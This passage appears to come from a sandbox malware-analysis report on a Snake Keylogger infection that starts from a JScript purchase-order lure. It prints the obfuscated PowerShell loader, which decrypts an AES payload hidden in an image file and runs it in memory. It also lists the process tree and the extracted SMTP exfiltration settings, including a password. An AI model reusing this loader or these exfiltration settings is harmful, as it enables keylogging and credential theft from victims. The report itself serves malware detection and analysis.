VPJJRWOAGUAdABTAHTUVPJJRWOQAcgBpAG4ATUVPJJRWOZwAoAFsAQwTUVPJJRWOBvAG4AdgBlTUVPJJRWOAHIAdABdADTUVPJJRWOoAOgBGAHIATUVPJJRWObwBtAEIAYQTUVPJJRWOBzAGUANgA0TUVPJJRWOAFMAdAByAGTUVPJJRWOkAbgBnACgATUVPJJRWOJABlAG4AYwTUVPJJRWOBvAGQAZQBkTUVPJJRWOAEMAbwBtAGTUVPJJRWO0AYQBuAGQATUVPJJRWOKQApAAoAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACAAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAjACAAVwByTUVPJJRWOAGkAdABlACTUVPJJRWO0ASABvAHMATUVPJJRWOdAAgACIAZATUVPJJRWOBvAG4AZQAiTUVPJJRWOAAoAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACAAIAAjACTUVPJJRWOAARQB4AGUATUVPJJRWOYwB1AHQAZQTUVPJJRWOAgAHQAaABlTUVPJJRWOACAAZABlAGTUVPJJRWOMAbwBkAGUATUVPJJRWOZAAgAGMAbwTUVPJJRWOBtAG0AYQBuTUVPJJRWOAGQACgAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACAAIAAgAETUVPJJRWOkAbgB2AG8ATUVPJJRWOawBlAC0ARQTUVPJJRWOB4AHAAcgBlTUVPJJRWOAHMAcwBpAGTUVPJJRWO8AbgAgACQATUVPJJRWOZABlAGMAbwTUVPJJRWOBkAGUAZABDTUVPJJRWOAG8AbQBtAGTUVPJJRWOEAbgBkAAoATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACAAIAAgACTUVPJJRWOAAfQAgAGUATUVPJJRWObABzAGUAIATUVPJJRWOB7AAoAIAAgTUVPJJRWOACAAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACMAIAAgTUVPJJRWOAFcAcgBpAHTUVPJJRWOQAZQAtAEgATUVPJJRWObwBzAHQAIATUVPJJRWOAiAFMAawBpTUVPJJRWOAHAAcABlAGTUVPJJRWOQAIABpAG4ATUVPJJRWOdgBhAGwAaQTUVPJJRWOBkACAAQgBhTUVPJJRWOAHMAZQA2ADTUVPJJRWOQAIABjAG8ATUVPJJRWObQBtAGEAbgTUVPJJRWOBkADoAIAAkTUVPJJRWOAGUAbgBjAGTUVPJJRWO8AZABlAGQATUVPJJRWOQwBvAG0AbQTUVPJJRWOBhAG4AZAAiTUVPJJRWOAAoAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAfQAKTUVPJJRWOACAAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAB9ACAAZQTUVPJJRWOBsAHMAZQAgTUVPJJRWOAHsACgAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACMAIAAgTUVPJJRWOAFcAcgBpAHTUVPJJRWOQAZQAtAEgATUVPJJRWObwBzAHQAIATUVPJJRWOAiAFMAawBpTUVPJJRWOAHAAcABlAGTUVPJJRWOQAIABhAG4ATUVPJJRWOIABlAG0AcATUVPJJRWOB0AHkAIABjTUVPJJRWOAG8AbQBtAGTUVPJJRWOEAbgBkAC4ATUVPJJRWOIgAKACAAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACAAIAB9AATUVPJJRWOoAIAAgACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgAAoAIAAgTUVPJJRWOACAAIAB9ACTUVPJJRWOAAYwBhAHQATUVPJJRWOYwBoACAAewTUVPJJRWOAKACAAIAAgTUVPJJRWOACAAIAAgACTUVPJJRWOMAIAAgAFcATUVPJJRWOcgBpAHQAZQTUVPJJRWOAtAEgAbwBzTUVPJJRWOAHQAIAAoACTUVPJJRWOIARQByAHIATUVPJJRWObwByACAAZQTUVPJJRWOB4AGUAYwB1TUVPJJRWOAHQAaQBuAGTUVPJJRWOcAIABjAG8ATUVPJJRWObQBtAGEAbgTUVPJJRWOBkADoAIAB7TUVPJJRWOADAAfQAiACTUVPJJRWOAALQBmACAATUVPJJRWOJABfAC4ARQTUVPJJRWOB4AGMAZQBwTUVPJJRWOAHQAaQBvAGTUVPJJRWO4ALgBNAGUATUVPJJRWOcwBzAGEAZwTUVPJJRWOBlACkACgAgTUVPJJRWOACAAIAAgAHTUVPJJRWO0ACgB9AAoATUVPJJRWOCgAKAAoACgTUVPJJRWOAKAAoACgAKTUVPJJRWOAAoACgAKAATUVPJJRWOoACgAKAAoATUVPJJRWOIwAgAEkAbgTUVPJJRWOBwAHUAdAAgTUVPJJRWOAEIAYQBzAGTUVPJJRWOUANgA0ACAATUVPJJRWOZQBuAGMAcgTUVPJJRWOB5AHAAdABlTUVPJJRWOAGQAIABmAGTUVPJJRWOkAbABlACAATUVPJJRWOcABhAHQAaATUVPJJRWOAKACQAaQBuTUVPJJRWOAHAAdQB0AETUVPJJRWOIAYQBzAGUATUVPJJRWONgA0AEYAaQTUVPJJRWOBsAGUAUABhTUVPJJRWOAHQAaAAgADTUVPJJRWO0AIAAiAEMATUVPJJRWOOgBcAFUAcwTUVPJJRWOBlAHIAcwBcTUVPJJRWOAFAAVQBCAETUVPJJRWOwASQBDAFwATUVPJJRWOVgBpAGwAZQTUVPJJRWOAuAHAAbgBnTUVPJJRWOACIACgAKACTUVPJJRWOMAIABDAHIATUVPJJRWOZQBhAHQAZQTUVPJJRWOAgAGEAIABuTUVPJJRWOAGUAdwAgAETUVPJJRWOEARQBTACAATUVPJJRWObwBiAGoAZQTUVPJJRWOBjAHQACgAkTUVPJJRWOAGEAZQBzAFTUVPJJRWO8AdgBhAHIATUVPJJRWOIAA9ACAAWwTUVPJJRWOBTAHkAcwB0TUVPJJRWOAGUAbQAuAFTUVPJJRWOMAZQBjAHUATUVPJJRWOcgBpAHQAeQTUVPJJRWOAuAEMAcgB5TUVPJJRWOAHAAdABvAGTUVPJJRWOcAcgBhAHAATUVPJJRWOaAB5AC4AQQTUVPJJRWOBlAHMAXQA6TUVPJJRWOADoAQwByAGTUVPJJRWOUAYQB0AGUATUVPJJRWOKAApAAoACgTUVPJJRWOAjACAAUwBlTUVPJJRWOAHQAIABBAETUVPJJRWOUAUwAgAHAATUVPJJRWOYQByAGEAbQTUVPJJRWOBlAHQAZQByTUVPJJRWOAHMACgAkAGTUVPJJRWOEAZQBzAF8ATUVPJJRWOdgBhAHIALgTUVPJJRWOBNAG8AZABlTUVPJJRWOACAAPQAgAFTUVPJJRWOsAUwB5AHMATUVPJJRWOdABlAG0ALgTUVPJJRWOBTAGUAYwB1TUVPJJRWOAHIAaQB0AHTUVPJJRWOkALgBDAHIATUVPJJRWOeQBwAHQAbwTUVPJJRWOBnAHIAYQBwTUVPJJRWOAGgAeQAuAETUVPJJRWOMAaQBwAGgATUVPJJRWOZQByAE0AbwTUVPJJRWOBkAGUAXQA6TUVPJJRWOADoAQwBCAETUVPJJRWOMACgAkAGEATUVPJJRWOZQBzAF8AdgTUVPJJRWOBhAHIALgBQTUVPJJRWOAGEAZABkAGTUVPJJRWOkAbgBnACAATUVPJJRWOPQAgAFsAUwTUVPJJRWOB5AHMAdABlTUVPJJRWOAG0ALgBTAGTUVPJJRWOUAYwB1AHIATUVPJJRWOaQB0AHkALgTUVPJJRWOBDAHIAeQBwTUVPJJRWOAHQAbwBnAHTUVPJJRWOIAYQBwAGgATUVPJJRWOeQAuAFAAYQTUVPJJRWOBkAGQAaQBuTUVPJJRWOAGcATQBvAGTUVPJJRWOQAZQBdADoATUVPJJRWOOgBQAEsAQwTUVPJJRWOBTADcACgAkTUVPJJRWOAGEAZQBzAFTUVPJJRWO8AdgBhAHIATUVPJJRWOLgBLAGUAeQTUVPJJRWOAgAD0AIABbTUVPJJRWOAFMAeQBzAHTUVPJJRWOQAZQBtAC4ATUVPJJRWOQwBvAG4AdgTUVPJJRWOBlAHIAdABdTUVPJJRWOADoAOgBGAHTUVPJJRWOIAbwBtAEIATUVPJJRWOYQBzAGUANgTUVPJJRWOA0AFMAdAByTUVPJJRWOAGkAbgBnACTUVPJJRWOgAJABGAE8ATUVPJJRWOTgBJAEEAMQTUVPJJRWOApACAAIAAjTUVPJJRWOACAAWQBvAHTUVPJJRWOUAcgAgAEEATUVPJJRWORQBTACAAawTUVPJJRWOBlAHkACgAkTUVPJJRWOAGEAZQBzAFTUVPJJRWO8AdgBhAHIATUVPJJRWOLgBJAFYAIATUVPJJRWOA9ACAAIABbTUVPJJRWOAFMAeQBzAHTUVPJJRWOQAZQBtAC4ATUVPJJRWOQwBvAG4AdgTUVPJJRWOBlAHIAdABdTUVPJJRWOADoAOgBGAHTUVPJJRWOIAbwBtAEIATUVPJJRWOYQBzAGUANgTUVPJJRWOA0AFMAdAByTUVPJJRWOAGkAbgBnACTUVPJJRWOgAJABGAE8ATUVPJJRWOTgBJAEEAMgTUVPJJRWOApACAAIAAjTUVPJJRWOACAAWQBvAHTUVPJJRWOUAcgAgAEkATUVPJJRWOVgAKAAoAIwTUVPJJRWOAgAFIAZQBhTUVPJJRWOAGQAIAB0AGTUVPJJRWOgAZQAgAEIATUVPJJRWOYQBzAGUANgTUVPJJRWOA0AC0AZQBuTUVPJJRWOAGMAbwBkAGTUVPJJRWOUAZAAgAGUATUVPJJRWObgBjAHIAeQTUVPJJRWOBwAHQAZQBkTUVPJJRWOACAAZABhAHTUVPJJRWOQAYQAKACQATUVPJJRWOYgBhAHMAZQTUVPJJRWOA2ADQAUwB0TUVPJJRWOAHIAaQBuAGTUVPJJRWOcAIAA9ACAATUVPJJRWOWwBTAHkAcwTUVPJJRWOB0AGUAbQAuTUVPJJRWOAEkATwAuAETUVPJJRWOYAaQBsAGUATUVPJJRWOXQA6ADoAUgTUVPJJRWOBlAGEAZABBTUVPJJRWOAGwAbABUAGTUVPJJRWOUAeAB0ACgATUVPJJRWOJABpAG4AcATUVPJJRWOB1AHQAQgBhTUVPJJRWOAHMAZQA2ADTUVPJJRWOQARgBpAGwATUVPJJRWOZQBQAGEAdATUVPJJRWOBoACkACgAKTUVPJJRWOACMAIABDAGTUVPJJRWO8AbgB2AGUATUVPJJRWOcgB0ACAAQgTUVPJJRWOBhAHMAZQA2TUVPJJRWOADQAIABzAHTUVPJJRWOQAcgBpAG4ATUVPJJRWOZwAgAHQAbwTUVPJJRWOAgAGIAeQB0TUVPJJRWOAGUAIABhAHTUVPJJRWOIAcgBhAHkATUVPJJRWOCgAkAGUAbgTUVPJJRWOBjAHIAeQBwTUVPJJRWOAHQAZQBkAETUVPJJRWOIAeQB0AGUATUVPJJRWOcwAgAD0AIATUVPJJRWOBbAFMAeQBzTUVPJJRWOAHQAZQBtACTUVPJJRWO4AQwBvAG4ATUVPJJRWOdgBlAHIAdATUVPJJRWOBdADoAOgBGTUVPJJRWOAHIAbwBtAETUVPJJRWOIAYQBzAGUATUVPJJRWONgA0AFMAdATUVPJJRWOByAGkAbgBnTUVPJJRWOACgAJABiAGTUVPJJRWOEAcwBlADYATUVPJJRWONABTAHQAcgTUVPJJRWOBpAG4AZwApTUVPJJRWOAAoACgAjACTUVPJJRWOAAQwByAGUATUVPJJRWOYQB0AGUAIATUVPJJRWOBhACAATQBlTUVPJJRWOAG0AbwByAHTUVPJJRWOkAUwB0AHIATUVPJJRWOZQBhAG0AIATUVPJJRWOBmAHIAbwBtTUVPJJRWOACAAdABoAGTUVPJJRWOUAIABlAG4ATUVPJJRWOYwByAHkAcATUVPJJRWOB0AGUAZAAgTUVPJJRWOAGIAeQB0AGTUVPJJRWOUAIABhAHIATUVPJJRWOcgBhAHkACgTUVPJJRWOAkAG0AZQBtTUVPJJRWOAG8AcgB5AFTUVPJJRWOMAdAByAGUATUVPJJRWOYQBtACAAPQTUVPJJRWOAgAFsAUwB5TUVPJJRWOAHMAdABlAGTUVPJJRWO0ALgBJAE8ATUVPJJRWOLgBNAGUAbQTUVPJJRWOBvAHIAeQBTTUVPJJRWOAHQAcgBlAGTUVPJJRWOEAbQBdADoATUVPJJRWOOgBuAGUAdwTUVPJJRWOAoACkACgAkTUVPJJRWOAG0AZQBtAGTUVPJJRWO8AcgB5AFMATUVPJJRWOdAByAGUAYQTUVPJJRWOBtAC4AVwByTUVPJJRWOAGkAdABlACTUVPJJRWOgAJABlAG4ATUVPJJRWOYwByAHkAcATUVPJJRWOB0AGUAZABCTUVPJJRWOAHkAdABlAHTUVPJJRWOMALAAgADAATUVPJJRWOLAAgACQAZQTUVPJJRWOBuAGMAcgB5TUVPJJRWOAHAAdABlAGTUVPJJRWOQAQgB5AHQATUVPJJRWOZQBzAC4ATATUVPJJRWOBlAG4AZwB0TUVPJJRWOAGgAKQAKACTUVPJJRWOQAbQBlAG0ATUVPJJRWObwByAHkAUwTUVPJJRWOB0AHIAZQBhTUVPJJRWOAG0ALgBQAGTUVPJJRWO8AcwBpAHQATUVPJJRWOaQBvAG4AIATUVPJJRWOA9ACAAMAAgTUVPJJRWOACAAIwAgAFTUVPJJRWOIAZQBzAGUATUVPJJRWOdAAgAHQAaATUVPJJRWOBlACAAcABvTUVPJJRWOAHMAaQB0AGTUVPJJRWOkAbwBuACAATUVPJJRWOZgBvAHIAIATUVPJJRWOByAGUAYQBkTUVPJJRWOAGkAbgBnAATUVPJJRWOoACgAjACAATUVPJJRWOQwByAGUAYQTUVPJJRWOB0AGUAIABhTUVPJJRWOACAAZABlAGTUVPJJRWOMAcgB5AHAATUVPJJRWOdABvAHIACgTUVPJJRWOAkAGQAZQBjTUVPJJRWOAHIAeQBwAHTUVPJJRWOQAbwByACAATUVPJJRWOPQAgACQAYQTUVPJJRWOBlAHMAXwB2TUVPJJRWOAGEAcgAuAETUVPJJRWOMAcgBlAGEATUVPJJRWOdABlAEQAZQTUVPJJRWOBjAHIAeQBwTUVPJJRWOAHQAbwByACTUVPJJRWOgAKQAKAAoATUVPJJRWOIwAgAEMAcgTUVPJJRWOBlAGEAdABlTUVPJJRWOACAAYQAgAETUVPJJRWOMAcgB5AHAATUVPJJRWOdABvAFMAdATUVPJJRWOByAGUAYQBtTUVPJJRWOACAAZgBvAHTUVPJJRWOIAIABkAGUATUVPJJRWOYwByAHkAcATUVPJJRWOB0AGkAbwBuTUVPJJRWOAAoAJABjAHTUVPJJRWOIAeQBwAHQATUVPJJRWObwBTAHQAcgTUVPJJRWOBlAGEAbQAgTUVPJJRWOAD0AIABOAGTUVPJJRWOUAdwAtAE8ATUVPJJRWOYgBqAGUAYwTUVPJJRWOB0ACAAUwB5TUVPJJRWOAHMAdABlAGTUVPJJRWO0ALgBTAGUATUVPJJRWOYwB1AHIAaQTUVPJJRWOB0AHkALgBDTUVPJJRWOAHIAeQBwAHTUVPJJRWOQAbwBnAHIATUVPJJRWOYQBwAGgAeQTUVPJJRWOAuAEMAcgB5TUVPJJRWOAHAAdABvAFTUVPJJRWOMAdAByAGUATUVPJJRWOYQBtACgAJATUVPJJRWOBtAGUAbQBvTUVPJJRWOAHIAeQBTAHTUVPJJRWOQAcgBlAGEATUVPJJRWObQAsACAAJATUVPJJRWOBkAGUAYwByTUVPJJRWOAHkAcAB0AGTUVPJJRWO8AcgAsACAATUVPJJRWOWwBTAHkAcwTUVPJJRWOB0AGUAbQAuTUVPJJRWOAFMAZQBjAHTUVPJJRWOUAcgBpAHQATUVPJJRWOeQAuAEMAcgTUVPJJRWOB5AHAAdABvTUVPJJRWOAGcAcgBhAHTUVPJJRWOAAaAB5AC4ATUVPJJRWOQwByAHkAcATUVPJJRWOB0AG8AUwB0TUVPJJRWOAHIAZQBhAGTUVPJJRWO0ATQBvAGQATUVPJJRWOZQBdADoAOgTUVPJJRWOBSAGUAYQBkTUVPJJRWOACkACgAKACTUVPJJRWOMAIABEAGUATUVPJJRWOYwByAHkAcATUVPJJRWOB0ACAAdABoTUVPJJRWOAGUAIABkAGTUVPJJRWOEAdABhACAATUVPJJRWOaQBuAHQAbwTUVPJJRWOAgAGEAIABNTUVPJJRWOAGUAbQBvAHTUVPJJRWOIAeQBTAHQATUVPJJRWOcgBlAGEAbQTUVPJJRWOAgACgAbgBvTUVPJJRWOACAAZgBpAGTUVPJJRWOwAZQAgAG8ATUVPJJRWOdQB0AHAAdQTUVPJJRWOB0ACkACgAkTUVPJJRWOAGQAZQBjAHTUVPJJRWOIAeQBwAHQATUVPJJRWOZQBkAE0AZQTUVPJJRWOBtAG8AcgB5TUVPJJRWOAFMAdAByAGTUVPJJRWOUAYQBtACAATUVPJJRWOPQAgAFsAUwTUVPJJRWOB5AHMAdABlTUVPJJRWOAG0ALgBJAETUVPJJRWO8ALgBNAGUATUVPJJRWObQBvAHIAeQTUVPJJRWOBTAHQAcgBlTUVPJJRWOAGEAbQBdADTUVPJJRWOoAOgBuAGUATUVPJJRWOdwAoACkACgTUVPJJRWOB0AHIAeQAgTUVPJJRWOAHsACgAgACTUVPJJRWOAAIAAgACQATUVPJJRWOYgB1AGYAZgTUVPJJRWOBlAHIAIAA9TUVPJJRWOACAATgBlAHTUVPJJRWOcALQBPAGIATUVPJJRWOagBlAGMAdATUVPJJRWOAgAGIAeQB0TUVPJJRWOAGUAWwBdACTUVPJJRWOAANAAwADkATUVPJJRWONgAKACAAIATUVPJJRWOAgACAAJABiTUVPJJRWOAHkAdABlAHTUVPJJRWOMAUgBlAGEATUVPJJRWOZAAgAD0AIATUVPJJRWOAwAAoACgAgTUVPJJRWOACAAIAAgAHTUVPJJRWOcAaABpAGwATUVPJJRWOZQAgACgAKATUVPJJRWOAkAGIAeQB0TUVPJJRWOAGUAcwBSAGTUVPJJRWOUAYQBkACAATUVPJJRWOPQAgACQAYwTUVPJJRWOByAHkAcAB0TUVPJJRWOAG8AUwB0AHTUVPJJRWOIAZQBhAG0ATUVPJJRWOLgBSAGUAYQTUVPJJRWOBkACgAJABiTUVPJJRWOAHUAZgBmAGTUVPJJRWOUAcgAsACAATUVPJJRWOMAAsACAAJATUVPJJRWOBiAHUAZgBmTUVPJJRWOAGUAcgAuAETUVPJJRWOwAZQBuAGcATUVPJJRWOdABoACkAKQTUVPJJRWOAgAC0AZwB0TUVPJJRWOACAAMAApACTUVPJJRWOAAewAKACAATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAIAAkTUVPJJRWOAGQAZQBjAHTUVPJJRWOIAeQBwAHQATUVPJJRWOZQBkAE0AZQTUVPJJRWOBtAG8AcgB5TUVPJJRWOAFMAdAByAGTUVPJJRWOUAYQBtAC4ATUVPJJRWOVwByAGkAdATUVPJJRWOBlACgAJABiTUVPJJRWOAHUAZgBmAGTUVPJJRWOUAcgAsACAATUVPJJRWOMAAsACAAJATUVPJJRWOBiAHkAdABlTUVPJJRWOAHMAUgBlAGTUVPJJRWOEAZAApAAoATUVPJJRWOIAAgACAAIATUVPJJRWOB9AAoAIAAgTUVPJJRWOACAAIAAkAGTUVPJJRWOQAZQBjAHIATUVPJJRWOeQBwAHQAZQTUVPJJRWOBkAE0AZQBtTUVPJJRWOAG8AcgB5AFTUVPJJRWOMAdAByAGUATUVPJJRWOYQBtAC4AUATUVPJJRWOBvAHMAaQB0TUVPJJRWOAGkAbwBuACTUVPJJRWOAAPQAgADAATUVPJJRWOCgB9ACAAYwTUVPJJRWOBhAHQAYwBoTUVPJJRWOACAAewAKACTUVPJJRWOAAIAAgACMATUVPJJRWOIABXAHIAaQTUVPJJRWOB0AGUALQBITUVPJJRWOAG8AcwB0ACTUVPJJRWOAAKAAiAEUATUVPJJRWOcgByAG8AcgTUVPJJRWOAgAGQAdQByTUVPJJRWOAGkAbgBnACTUVPJJRWOAAZABlAGMATUVPJJRWOcgB5AHAAdATUVPJJRWOBpAG8AbgA6TUVPJJRWOACAAewAwAHTUVPJJRWO0AIgAgAC0ATUVPJJRWOZgAgACQAXwTUVPJJRWOApAAoAfQAgTUVPJJRWOAGYAaQBuAGTUVPJJRWOEAbABsAHkATUVPJJRWOIAB7AAoAIATUVPJJRWOAgACAAIAAkTUVPJJRWOAGMAcgB5AHTUVPJJRWOAAdABvAFMATUVPJJRWOdAByAGUAYQTUVPJJRWOBtAC4AQwBsTUVPJJRWOAG8AcwBlACTUVPJJRWOgAKQAKACAATUVPJJRWOIAAgACAAJATUVPJJRWOBtAGUAbQBvTUVPJJRWOAHIAeQBTAHTUVPJJRWOQAcgBlAGEATUVPJJRWObQAuAEMAbATUVPJJRWOBvAHMAZQAoTUVPJJRWOACkACgB9AATUVPJJRWOoACgAjACAATUVPJJRWOTABvAGEAZATUVPJJRWOAgAHQAaABlTUVPJJRWOACAAZABlAGTUVPJJRWOMAcgB5AHAATUVPJJRWOdABlAGQAIATUVPJJRWOBlAHgAZQBjTUVPJJRWOAHUAdABhAGTUVPJJRWOIAbABlACAATUVPJJRWOZgByAG8AbQTUVPJJRWOAgAG0AZQBtTUVPJJRWOAG8AcgB5AATUVPJJRWOoAdAByAHkATUVPJJRWOIAB7AAoAIATUVPJJRWOAgACAAIAAkTUVPJJRWOAGQAZQBjAHTUVPJJRWOIAeQBwAHQATUVPJJRWOZQBkAEIAeQTUVPJJRWOB0AGUAcwAgTUVPJJRWOAD0AIAAkAGTUVPJJRWOQAZQBjAHIATUVPJJRWOeQBwAHQAZQTUVPJJRWOBkAE0AZQBtTUVPJJRWOAG8AcgB5AFTUVPJJRWOMAdAByAGUATUVPJJRWOYQBtAC4AVATUVPJJRWOBvAEEAcgByTUVPJJRWOAGEAeQAoACTUVPJJRWOkACgAgACAATUVPJJRWOIAAgACQAZATUVPJJRWOBlAGMAcgB5TUVPJJRWOAHAAdABlAGTUVPJJRWOQATQBlAG0ATUVPJJRWObwByAHkAUwTUVPJJRWOB0AHIAZQBhTUVPJJRWOAG0ALgBDAGTUVPJJRWOwAbwBzAGUATUVPJJRWOKAApAAoACgTUVPJJRWOAgACAAIAAgTUVPJJRWOACMAIABBAHTUVPJJRWOQAdABlAG0ATUVPJJRWOcAB0ACAAdATUVPJJRWOBvACAAbABvTUVPJJRWOAGEAZAAgAGTUVPJJRWOEAcwAgAGEATUVPJJRWObgAgAGEAcwTUVPJJRWOBzAGUAbQBiTUVPJJRWOAGwAeQAKACTUVPJJRWOAAIAAgACAATUVPJJRWOJABhAHMAcwTUVPJJRWOBlAG0AYgBsTUVPJJRWOAHkAIAA9ACTUVPJJRWOAAWwBSAGUATUVPJJRWOZgBsAGUAYwTUVPJJRWOB0AGkAbwBuTUVPJJRWOAC4AQQBzAHTUVPJJRWOMAZQBtAGIATUVPJJRWObAB5AF0AOgTUVPJJRWOA6AEwAbwBhTUVPJJRWOAGQAKAAkAGTUVPJJRWOQAZQBjAHIATUVPJJRWOeQBwAHQAZQTUVPJJRWOBkAEIAeQB0TUVPJJRWOAGUAcwApAATUVPJJRWOoAIAAgACAATUVPJJRWOIAAjAFcAcgTUVPJJRWOBpAHQAZQAtTUVPJJRWOAEgAbwBzAHTUVPJJRWOQAIAAiAEEATUVPJJRWOcwBzAGUAbQTUVPJJRWOBiAGwAeQAgTUVPJJRWOAGwAbwBhAGTUVPJJRWOQAZQBkACAATUVPJJRWOcwB1AGMAYwTUVPJJRWOBlAHMAcwBmTUVPJJRWOAHUAbABsAHTUVPJJRWOkALgAgAFIATUVPJJRWOdQBuAG4AaQTUVPJJRWOBuAGcALgAuTUVPJJRWOAC4AIgAKAATUVPJJRWOoAIAAgACAATUVPJJRWOIAAjACAASQTUVPJJRWOBuAHYAbwBrTUVPJJRWOAGUAIAB0AGTUVPJJRWOgAZQAgAGUATUVPJJRWObgB0AHIAeQTUVPJJRWOAgAHAAbwBpTUVPJJRWOAG4AdAAKACTUVPJJRWOAAIAAgACAATUVPJJRWOJABlAG4AdATUVPJJRWOByAHkAUABvTUVPJJRWOAGkAbgB0ACTUVPJJRWOAAPQAgACQATUVPJJRWOYQBzAHMAZQTUVPJJRWOBtAGIAbAB5TUVPJJRWOAC4ARQBuAHTUVPJJRWOQAcgB5AFAATUVPJJRWObwBpAG4AdATUVPJJRWOAKACAAIAAgTUVPJJRWOACAAaQBmACTUVPJJRWOAAKAAkAGUATUVPJJRWObgB0AHIAeQTUVPJJRWOBQAG8AaQBuTUVPJJRWOAHQAIAAtAGTUVPJJRWO4AZQAgACQATUVPJJRWObgB1AGwAbATUVPJJRWOApACAAewAKTUVPJJRWOACAAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOIAAjACAAQwTUVPJJRWOByAGUAYQB0TUVPJJRWOAGUAIABhAGTUVPJJRWO4AIABhAHIATUVPJJRWOcgBhAHkAIATUVPJJRWOBvAGYAIABwTUVPJJRWOAGEAcgBhAGTUVPJJRWO0AZQB0AGUATUVPJJRWOcgBzACAAdATUVPJJRWOBvACAAcABhTUVPJJRWOAHMAcwAgAHTUVPJJRWOQAbwAgAHQATUVPJJRWOaABlACAAbQTUVPJJRWOBhAGkAbgAgTUVPJJRWOAG0AZQB0AGTUVPJJRWOgAbwBkAAoATUVPJJRWOIAAgACAAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACQAcABhAHTUVPJJRWOIAYQBtAHMATUVPJJRWOIAA9ACAAQATUVPJJRWOAoACkACgAgTUVPJJRWOACAAIAAgACTUVPJJRWOAAIAAgACAATUVPJJRWOJABlAG4AdATUVPJJRWOByAHkAUABvTUVPJJRWOAGkAbgB0ACTUVPJJRWO4ASQBuAHYATUVPJJRWObwBrAGUAKATUVPJJRWOAkAG4AdQBsTUVPJJRWOAGwALAAgACTUVPJJRWOQAcABhAHIATUVPJJRWOYQBtAHMAKQTUVPJJRWOAKACAAIAAgTUVPJJRWOACAAfQAgAGTUVPJJRWOUAbABzAGUATUVPJJRWOIAB7AAoAIATUVPJJRWOAgACAAIAAgTUVPJJRWOACMAIAAgACTUVPJJRWOAAVwByAGkATUVPJJRWOdABlAC0ASATUVPJJRWOBvAHMAdAAgTUVPJJRWOACIATgBvACTUVPJJRWOAAZQBuAHQATUVPJJRWOcgB5ACAAcATUVPJJRWOBvAGkAbgB0TUVPJJRWOACAAZgBvAHTUVPJJRWOUAbgBkACAATUVPJJRWOaQBuACAAYQTUVPJJRWOBzAHMAZQBtTUVPJJRWOAGIAbAB5ACTUVPJJRWO4AIgAKACAATUVPJJRWOIAAgACAAfQTUVPJJRWOAKAAoAfQAgTUVPJJRWOAGMAYQB0AGTUVPJJRWOMAaAAgAHsATUVPJJRWOCgAgACAAIwTUVPJJRWOAgACAAVwByTUVPJJRWOAGkAdABlACTUVPJJRWO0ASABvAHMATUVPJJRWOdAAgACgAIgTUVPJJRWOBGAGEAaQBsTUVPJJRWOAGUAZAAgAHTUVPJJRWOQAbwAgAGwATUVPJJRWObwBhAGQAIATUVPJJRWOBhAHMAcwBlTUVPJJRWOAG0AYgBsAHTUVPJJRWOkAOgAgAHsATUVPJJRWOMAB9ACIAIATUVPJJRWOAtAGYAIAAkTUVPJJRWOAF8AKQAKAHTUVPJJRWO0ACgA=TUVPJJRWO'.Replace('TUVPJJRWO','')))))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
SnakeKeylogger
(PID) Process(2788) powershell.exe
Keys
DES6fc98cd68a1aab8b
Options
SMTP Usersnakesender@exzwzc.com
SMTP PasswordQwerty!@#
SMTP Hostcphost17.qhoster.net
SMTP SendTokingmethodlogs2026@exzwzc.com
SMTP Port587
2912\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3920C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6020"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\RFQ 07283 and PO Request.JS"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
